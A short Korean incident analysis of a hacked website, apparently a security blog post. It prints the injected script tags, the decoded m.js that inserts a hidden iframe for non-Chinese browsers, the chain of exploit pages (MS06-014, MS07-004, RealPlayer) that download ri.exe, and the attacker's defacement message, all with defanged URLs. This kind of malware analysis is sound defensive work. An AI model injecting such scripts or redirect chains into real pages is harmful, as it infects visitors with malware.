5월 12일에 분석되었던 것으로 당일 오후 5시 40분경에 조치가 되었던 것이다.
당시 분석했던 자료 중 일부이다.
http://fund.em(생략).com 접속시
http://fund.em(생략).com/main/ 실행
335번, 336번줄에 악성스크립트 삽입
<script src=hxxp://www.wo(생략)1.cn/m.js></script>
<script src=hxxp://www.wo(생략)1.cn/m.js></script>
m.js 는 암호화된 스크립트 코드로 구성
복호화를 하게 되면 아래와 같다.
if (navigator.systemLanguage=='zh-cn'){}else{document.writeln("<iframe src=hxxp://www.riri(생략).cn/index.htm width=100 height=0></iframe>");}
중국 브라우저는 감염이 되지 않도록 해 두었다.
hxxp://www.riri(생략).cn/index.htm
Multi Attack
hxxp://www.riri(생략).cn/14.htm -> MS06-014 Exploit -> hxxp://dj.juedui(생략).com/ri.exe
hxxp://www.riri(생략).cn/real.htm -> 연결안됨
hxxp://www.riri(생략).cn/real11.htm -> RealPlayer Exploit -> 연결시도
hxxp://js.us(생략).51.la/1862337.js - 연결안됨
hxxp://www(생략).la/?1862337 - 연결안됨
hxxp://www.riri(생략).cn/614.htm -> MS06-014 Exploit -> hxxp://dj.juedui(생략).com/ri.exe
hxxp://www.riri(생략).cn/07004.htm -> MS07-004 Exploit
hxxp://count36.51y(생략).com/click.aspx?id=363709613&logo=1
Index 내용으로 아래와 같은 문구를 보여준다.
This is a mass invasion. Safeguard the motherland's dignity!
FUCK FRANCE! FUCK CNN! I WILL ATTACK you ALWAYS !
I love my motherland!
sorry
Please understand that I
IF YOU WANT TO SAY SOMETHING .
PLEASE SEND EMAIL TO kiss11(생략)@163.com
